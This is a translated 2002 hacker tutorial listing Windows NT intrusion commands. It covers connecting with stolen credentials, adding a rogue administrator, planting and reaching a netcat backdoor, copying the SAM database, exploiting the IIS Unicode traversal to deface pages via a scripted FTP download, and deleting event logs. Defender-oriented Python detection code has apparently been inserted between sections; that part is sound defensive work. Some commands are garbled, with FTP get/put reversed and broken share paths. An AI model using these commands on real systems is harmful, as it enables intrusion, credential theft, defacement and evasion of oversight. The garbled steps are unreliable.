Several commonly used commands the ordinary hacker needs for an intrusion | http://www.cshu.net

Several commonly used commands the ordinary hacker needs for an intrusion
Www.cshu.net  2002-8-18  fog rain village

1: NET
As long as you have an IP address together with a user name and password, you can use that IP to make a connection.
Suppose the user you obtained is hbx, the password is 123,456, and the other side's IP is 127.0.0.1:
  net use \\127.0.0.1\ip "123,456" /user:"hbx"
The command to drop the connection is
  net use \\127.0.0.1\ip /delete
Everything below only works after you have logged on with the method above.
----------------------
Next, how to create a user. Because the SA (administrator) privilege is equivalent to the system super user, we add the user heibai with the password lovechina:
  net user heibai lovechina /add
As long as the command reports success, we can then add him to the Administrators group:
  net localgroup Administrators heibai /add
----------------------
This maps the other side's C drive; any other drive works too, as long as it exists. Here we map the other side's C drive as the local Z drive:
  net use z: \\127.0.0.1\
----------------------
  net start telnet
This starts the other side's TELNET service.
----------------------
This activates the Guest user. Guest is NT's default user, and supposedly cannot be deleted? I am not sure whether that is so; on my 2000 it could not be deleted.
  net user guest /active:yes
----------------------
This changes a user's password; here we change the guest password to lovechina. Any other user works too, as long as you have the privilege!
  net user guest lovechina
The net command is really powerful!
2: at
After an ordinary intruder gets in, he usually leaves a back door behind, which is a kind of trojan. You have uploaded the trojan; how do you start it?
Then you need the AT command. Here we suppose you have already logged on to that server.
First find out the other side's time:
  net time \\127.0.0.1
It returns the time; suppose the time returned is 12:1. Now create a new job, its ID=1:
  at \\127.0.0.1 12:3 nc.exe
Here we suppose the trojan is named NC.EXE and that it is already on the other side's server.
A word about NC: NC is the abbreviation of NETCAT; to make it convenient to type it is usually renamed. It provides a TELNET-style service on port 99.
Once 12:3 has passed you can connect to the other side's port 99. In this way the trojan has been planted on the other side.
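From the defender's side, the net user / net localgroup pair and the at job above each leave a distinct record in the Windows Security log. The following is an added example, not code from the original article; it assumes the records have already been parsed into dicts, that 4720, 4732 and 4698 are the standard user-created, member-added and scheduled-task-created event IDs, and that the legacy AT service names its jobs AtN.

```python
"""Added example (not from the original article): flag, in Windows Security
log records, the account-creation and scheduled-job sequence that the
`net user /add`, `net localgroup Administrators /add` and `at` commands above
leave behind.  Assumptions (mine): records are pre-parsed into dicts carrying
the usual fields; 4720 = user created, 4732 = member added to a local group,
4698 = scheduled task created; the legacy AT service names its jobs AtN."""
import re
from datetime import datetime, timedelta

# Constructed sample records mirroring the article's walkthrough (user "heibai").
EVENTS = [
    {"EventID": 4624, "TimeCreated": "2002-08-18 12:00:05",
     "SubjectUserName": "hbx", "TargetUserName": "hbx"},
    {"EventID": 4720, "TimeCreated": "2002-08-18 12:00:40",
     "SubjectUserName": "hbx", "TargetUserName": "heibai"},
    {"EventID": 4732, "TimeCreated": "2002-08-18 12:00:55", "SubjectUserName": "hbx",
     "TargetUserName": "heibai", "GroupName": "Administrators"},
    {"EventID": 4698, "TimeCreated": "2002-08-18 12:01:10",
     "SubjectUserName": "hbx", "TaskName": "At1"},
    {"EventID": 4720, "TimeCreated": "2002-08-18 15:30:00",
     "SubjectUserName": "helpdesk", "TargetUserName": "jsmith"},
]

def _ts(rec):
    return datetime.strptime(rec["TimeCreated"], "%Y-%m-%d %H:%M:%S")

def find_rapid_admin_creations(events, window=timedelta(minutes=10)):
    """(new account, creator) pairs where an account was added to Administrators
    within `window` of being created: the net user / net localgroup pair above."""
    created = {e["TargetUserName"]: e for e in events if e["EventID"] == 4720}
    hits = []
    for e in events:
        if e["EventID"] != 4732 or e.get("GroupName") != "Administrators":
            continue
        c = created.get(e["TargetUserName"])
        if c and timedelta(0) <= _ts(e) - _ts(c) <= window:
            hits.append((e["TargetUserName"], e["SubjectUserName"]))
    return hits

def find_at_jobs(events):
    """Scheduled-task creations named like legacy AT jobs (At1, At2, ...)."""
    return [e["TaskName"] for e in events
            if e["EventID"] == 4698 and re.fullmatch(r"At\d+", e.get("TaskName", ""))]
```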
3: telnet
This command is extremely practical: it can connect to a remote machine. Normally it needs the user name and password, but since you planted a trojan on the other side, you connect straight to the port that trojan opened:
  telnet 127.0.0.1 99
This connects to the other side's port 99. Then you can run commands on the other side; this is what is called a "meat chicken" (a compromised box).
4: FTP
It can transfer your files onto the other side's machine. You can apply for a web space that supports FTP uploads; there are many domestic ones, and if you really cannot find one, I recommend WWW.51.NET, which is good. After you apply, it gives you the user name, the password and the FTP server.
Before transferring you need to log on first. Here we suppose the FTP server is WWW.51.NET, the user name is HUCJS and the password is 654,321:
  ftp www.51.net
It asks for the user name and, after that succeeds, for the password.
----------------------
First, uploading. Suppose the file you must transfer is INDEX.HTM, located under C:\, and it goes to the other side's D:\:
  get c:\index.htm d:\
Suppose you must fetch INDEX.HTM from the other side's C drive down to your own machine's D drive:
  put c:\index.htm d:\
5: copy
Next, how to copy a local file up to the other side's hard disk. This only works after the IPC connection has been established.
Here we copy index.htm from the local C drive to the C drive of 127.0.0.1:
  copy index.htm \\127.0.0.1\\index.htm
----------------------
If you must copy it to the D drive, change C to D, and that's it:
  copy index.htm \\127.0.0.1\d$\index.htm
----------------------
If you must copy it into the WINNT directory, enter:
  copy index.htm \\127.0.0.1\admin$\index.htm
Admin$ is winnt.
----------------------
To copy a file from the other side. By the way, NT's backup of the account database is kept at x:\winnt\repair\sam._; sam._ is the database file name.
The following copies the database of 127.0.0.1 to the local C drive:
  copy \\127.0.0.1\admin$\repair\sam._ c:\
              ---------------------- 
6: Set
If you have got into a machine and want to deface it (an idea that is only feasible at special times), its port 80 must be open, otherwise whom would you be defacing? Now you need the SET command!
Below is the result I obtained. Analysing it, all I am looking for is where the main page lives.
  COMPUTERNAME=PENTIUMII
  ComSpec=D:\WINNT\system32\cmd.exe
  CONTENT_LENGTH=0
  GATEWAY_INTERFACE=CGI/1.1
  HTTP_ACCEPT=*/*
  HTTP_ACCEPT_LANGUAGE=zh-cn
  HTTP_CONNECTION=Keep-Alive
  HTTP_HOST=(the IP currently logged on to; originally my IP was shown here, I removed it)
  HTTP_ACCEPT_ENCODING=gzip, deflate
  HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
  NUMBER_OF_PROCESSORS=1
  Os2LibPath=D:\WINNT\system32\os2\dll;
  OS=Windows_NT
  Path=D:\WINNT\system32;D:\WINNT
  PATHEXT=.COM;.EXE;.BAT;.CMD
  PATH_TRANSLATED=E:\vlroot   <- the address where the main page is stored; whatever follows PATH_TRANSLATED= is the directory holding the main page, here E:\vlroot
  PROCESSOR_ARCHITECTURE=x86
  PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
  PROCESSOR_LEVEL=6
  PROCESSOR_REVISION=0303
  PROMPT=$P$G
  QUERY_STRING=/c+set
  REMOTE_ADDR=XX.XX.XX.XX
  REMOTE_HOST=XX.XX.XX.XX
  REQUEST_METHOD=GET
  SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
  SERVER_NAME=XX.XX.XX.XX
  SERVER_PORT=80
  SERVER_PORT_SECURE=0
  SERVER_PROTOCOL=HTTP/1.1
  SERVER_SOFTWARE=Microsoft-IIS/3.0   <- the other side uses IIS/3.0
  SystemDrive=D:
  SystemRoot=D:\WINNT
  Tz=gmt-9
  USERPROFILE=D:\WINNT\Profiles\Default User
  Windir=D:\WINNT
The highlighted line (PATH_TRANSLATED) is the address where the other side's main page is stored. Here is a trick, a very stupid one, but the only method that finds the main page's name with 100% certainty: when you DIR this directory you will see many files; type each file name into the browser as XX.XX.XX.XX/filename, and when the page that comes up looks exactly like XX.XX.XX.XX itself, that file is the main page.
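The SET dump above is only obtainable because the request SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe with QUERY_STRING=/c+set reached the command interpreter, and that request shape is what a defender should hunt for in the IIS logs. The following is an added example, not code from the original article; the log lines are constructed by me and the W3C field order (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) is an assumption.

```python
"""Added example (not from the original article): scan IIS W3C log lines for
the request shape visible in the SET dump above (SCRIPT_NAME=/scripts/..%2f../
winnt/system32/cmd.exe, QUERY_STRING=/c+set).  The lines are constructed by me;
the field order assumed is date time c-ip cs-method cs-uri-stem cs-uri-query
sc-status."""
import re
from urllib.parse import unquote

LOG_LINES = """\
2002-08-18 12:02:11 10.0.0.7 GET /index.htm - 200
2002-08-18 12:02:13 10.0.0.7 GET /scripts/..%2f../winnt/system32/cmd.exe /c+set 200
2002-08-18 12:02:20 10.0.0.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2002-08-18 12:05:40 10.0.0.9 GET /images/logo.gif - 304
"""

# Overlong UTF-8 forms of '/' and '\' (the bypass behind the "Unicode" bug)
# decode to U+FFFD in Python, so fold them to the separator IIS treated them as.
OVERLONG = {"%c0%af": "/", "%c1%9c": "\\"}

def canonical_path(uri_stem):
    """Lower-case, fold overlong separators, decode twice (double-encoding was
    the follow-up bypass), and normalise '\\' to '/'."""
    s = uri_stem.lower()
    for enc, ch in OVERLONG.items():
        s = s.replace(enc, ch)
    return unquote(unquote(s)).replace("\\", "/")

def find_cmd_traversal(log_text):
    """(client, decoded stem, decoded query) for GETs whose decoded path
    contains a '..' segment and ends in the command interpreter."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 7 or parts[3] != "GET":
            continue
        client, stem, query = parts[2], parts[4], parts[5]
        decoded = canonical_path(stem)
        if ".." in decoded.split("/") and re.search(r"/cmd\.exe$", decoded):
            hits.append((client, decoded, unquote(query.replace("+", " "))))
    return hits
```

Blocking at the decoder is the real fix (IIS patched this in MS00-078 and later canonicalisation work); the scan is for finding out whether it was ever used against you.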
7: Nbtstat
If you scan an NT machine and it has ports 136 to 139 open, you can use this command to obtain the user name. By the way, this is netbios. After obtaining the user name you can guess the password: for example very simple passwords, or a password the same as the user name; try them all, and if that does not work, go for brute force!
Many NT machines online now have these ports open; you can practise with what follows. Let us analyse the result obtained. The command is
  nbtstat -A XX.XX.XX.XX
The -A must be a capital letter.
Below is the result obtained.
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
PENTIUMII       <00>  UNIQUE      Registered
PENTIUMII       <20>  UNIQUE      Registered
ORAHOTOWN       <00>  GROUP       Registered
ORAHOTOWN       <1C>  GROUP       Registered
ORAHOTOWN       <1B>  UNIQUE      Registered
PENTIUMII       <03>  UNIQUE      Registered
INet~Services   <1C>  GROUP       Registered
IS~PENTIUMII... <00>  UNIQUE      Registered
ORAHOTOWN       <1E>  GROUP       Registered
ORAHOTOWN       <1D>  UNIQUE      Registered
..__MSBROWSE__. <01>  GROUP       Registered

MAC Address = 00-e0-29-14-35-ba

The highlighted entry is the user who has logged on to this system. You may not know how to read it: everybody sees the number in angle brackets; whenever that number is <03>, what comes before it is the user.
Here the user is PENTIUMII.
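Everything in that table is handed to anyone who can reach port 137, which is the reason to keep 137-139 off untrusted networks. The following is an added example, not code from the original article: it parses the name table shown above and summarises what the host discloses, using the documented NetBIOS suffix meanings, so a defender can run the same check against their own machines.

```python
"""Added example (not from the original article): parse the `nbtstat -A`
name table shown above and summarise what a host with 137-139 exposed
discloses, so a defender can audit their own machines.  Suffix meanings are
the documented NetBIOS name suffixes; the sample is the article's table."""
import re

NBT_TABLE = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
PENTIUMII       <00>  UNIQUE      Registered
PENTIUMII       <20>  UNIQUE      Registered
ORAHOTOWN       <00>  GROUP       Registered
ORAHOTOWN       <1C>  GROUP       Registered
ORAHOTOWN       <1B>  UNIQUE      Registered
PENTIUMII       <03>  UNIQUE      Registered
INet~Services   <1C>  GROUP       Registered
IS~PENTIUMII... <00>  UNIQUE      Registered
ORAHOTOWN       <1E>  GROUP       Registered
ORAHOTOWN       <1D>  UNIQUE      Registered
..__MSBROWSE__. <01>  GROUP       Registered

MAC Address = 00-e0-29-14-35-ba
"""

ROW = re.compile(r"^\s*(\S.*?)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)")

def parse_name_table(text):
    """Rows as (name, suffix, kind) plus the MAC address (or None)."""
    rows = [(m.group(1), m.group(2).upper(), m.group(3))
            for m in map(ROW.match, text.splitlines()) if m]
    mac = re.search(r"MAC Address\s*=\s*([0-9A-Fa-f-]{17})", text)
    return rows, (mac.group(1) if mac else None)

def summarize(text):
    """Computer name, domain, server roles and every <03> (Messenger) name,
    which is where the article reads the logged-on user from."""
    rows, mac = parse_name_table(text)
    info = {"computer": None, "domain": None, "roles": set(),
            "messenger_names": [], "mac": mac}
    for name, suffix, kind in rows:
        if suffix == "00":
            key = "computer" if kind == "UNIQUE" else "domain"
            info[key] = info[key] or name
        elif suffix == "20":
            info["roles"].add("server service (file/print shares)")
        elif suffix == "1B":
            info["roles"].add("domain master browser (PDC)")
        elif suffix == "1C" and name != "INet~Services":   # INet~Services <1C> is IIS
            info["roles"].add("domain controller")
        elif suffix == "03":
            info["messenger_names"].append(name)
    return info
```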
8: Shutdown
The command to shut down the other side's NT server:
  shutdown \\IP address t:20
After 20 seconds the NT shuts down automatically. Think three times before running this command; it causes the other side a very big loss. Be an intruder with a conscience.
9: DIR
There is not much to say about this command, but it is actually extremely important: it lists all the files and folders in a directory.
You can try it locally.
10: Echo
The famous Unicode vulnerability: with this command you can easily deface a host that has this vulnerability.
Suppose we want to write "The Nanjing massacre is conclusively proven; no Japanese may deny it!" into index.htm. There are two methods; everybody have a look at the difference:
  echo The Nanjing massacre is conclusively proven; no Japanese may deny it! >index.htm
  echo The Nanjing massacre is conclusively proven; no Japanese may deny it! >>index.htm
The first overwrites the original content of index.htm, putting "The Nanjing massacre is conclusively proven; no Japanese may deny it!" into index.htm.
The second appends "The Nanjing massacre is conclusively proven; no Japanese may deny it!" to the inside of index.htm.
">>" appends the output to the file; ">" overwrites the file's original content.
Everybody can try it locally.
You may ask what fun there is in something so simple. Actually it can be used to download a main page into the other side's directory.
1st, first we need to apply for a free web space.
2nd, in a directory you can write to, use echo to create a txt file with the following content (taking the chinaren server as an example):
  open upload.chinaren.com   (your FTP server, given to you when you applied for the space)
  cnhack                     (the user name you applied with)
  test                       (the password you applied with)
  get index.htm c:\inetpub\wwwroot\index.htm   (downloads index.htm from your space to the other side's c:\inetpub\wwwroot\index.htm)
  bye                        (leaves the FTP session, the same as leaving DOS with EXIT under 98)
Concrete procedure:
  type echo open upload.chinaren.com> c:\cnhack.txt
  type echo cnhack >> c:\cnhack.txt
  type echo 39abs >> c:\cnhack.txt
  type echo get index.htm c:\inetpub\wwwroot\index.htm >> c:\cnhack.txt
Finally type ftp -s:c:\cnhack.txt (the -s parameter of ftp executes the commands in the file).
When the commands have completed, the file has been downloaded to the location you specified.
Attention: after obtaining the file, please delete cnhack.txt. (If you do not delete it, others can very easily see your password.)
Remember: del c:\cnhack.txt
11: attrib
This command sets file attributes. If you want to deface a site but its main page has the read-only attribute set, that is very pitiful: you cannot delete it and you cannot overwrite it. Ouch! But with this command there is nothing to fear.
  attrib -r index.htm
This removes the read-only attribute from index.htm.
Changing "-" to "+" sets the read-only attribute on the file:
----------------------
  attrib +r index.htm
This sets index.htm to read-only.
12: del
When you see this title, do not skip it! Now you have to leave 127.0.0.1, and you have to delete the logs; you certainly must delete the logs, unless you want to get caught. Ha-ha.
The NT logs are these:
  del C:\winnt\system32\logfiles\*.*
  del C:\winnt\system32\config\*.evt
  del C:\winnt\system32\dtclog\*.*
  del C:\winnt\system32\*.log
  del C:\winnt\system32\*.txt
  del C:\winnt\*.txt
  del C:\winnt\*.log
Once these are deleted you are fine. On some systems NT is installed on the D drive or another drive; then change C to that drive.
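Seen from the host being used, sections 10 to 12 are a short, recognisable run of process command lines: echo building a text file, ftp -s: executing it, attrib -r on a web page, and del against the log directories. The following is an added example, not code from the original article; it assumes process-creation auditing is on (Security event 4688 with command line, or Sysmon event 1) and the record shape and sample lines are constructed by me.

```python
"""Added example (not from the original article): score Windows process-creation
command lines (Security 4688 with command-line auditing, or Sysmon event 1)
for the echo-built FTP script, attrib -r and log-deletion steps described above.
The record shape and the sample records are constructed by me."""
import re

# Constructed 4688-style records following the article's own command sequence.
PROC_EVENTS = [
    {"host": "PENTIUMII", "cmd": r"cmd.exe /c echo open upload.chinaren.com> c:\cnhack.txt"},
    {"host": "PENTIUMII", "cmd": r"cmd.exe /c echo cnhack >> c:\cnhack.txt"},
    {"host": "PENTIUMII", "cmd": r"cmd.exe /c ftp -s:c:\cnhack.txt"},
    {"host": "PENTIUMII", "cmd": r"attrib -r c:\inetpub\wwwroot\index.htm"},
    {"host": "PENTIUMII", "cmd": r"cmd.exe /c del C:\winnt\system32\logfiles\*.*"},
    {"host": "FILESRV01", "cmd": r"notepad.exe c:\notes.txt"},
]

# (rule name, pattern, weight): the weights favour the steps that are rarely
# legitimate on a web server (scripted ftp, wiping the log directories).
RULES = [
    ("ftp-script-built-with-echo",  re.compile(r"\becho\b.*>>?\s*\S+\.txt", re.I), 1),
    ("ftp-scripted-transfer",       re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I), 3),
    ("readonly-attribute-stripped", re.compile(r"\battrib(\.exe)?\b.*\s-r\b", re.I), 1),
    ("log-deletion",
     re.compile(r"\b(del|erase)\b.*\\(logfiles|config)\\.*\.(evt|log|\*)", re.I), 4),
]

def score_hosts(events, threshold=5):
    """Sum rule weights per host; return {host: sorted rule names} for hosts
    whose command-line sequence reaches `threshold`."""
    totals, fired = {}, {}
    for e in events:
        for name, rx, weight in RULES:
            if rx.search(e["cmd"]):
                totals[e["host"]] = totals.get(e["host"], 0) + weight
                fired.setdefault(e["host"], set()).add(name)
    return {h: sorted(fired[h]) for h, t in totals.items() if t >= threshold}
```

The del lines in the article also explain why logs should be forwarded off the host as they are written: a deletion on the box cannot reach copies already shipped to a collector.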



Original author: OICQ:929230
Origin: IntRudeRs
Altogether 212 readers have read this article
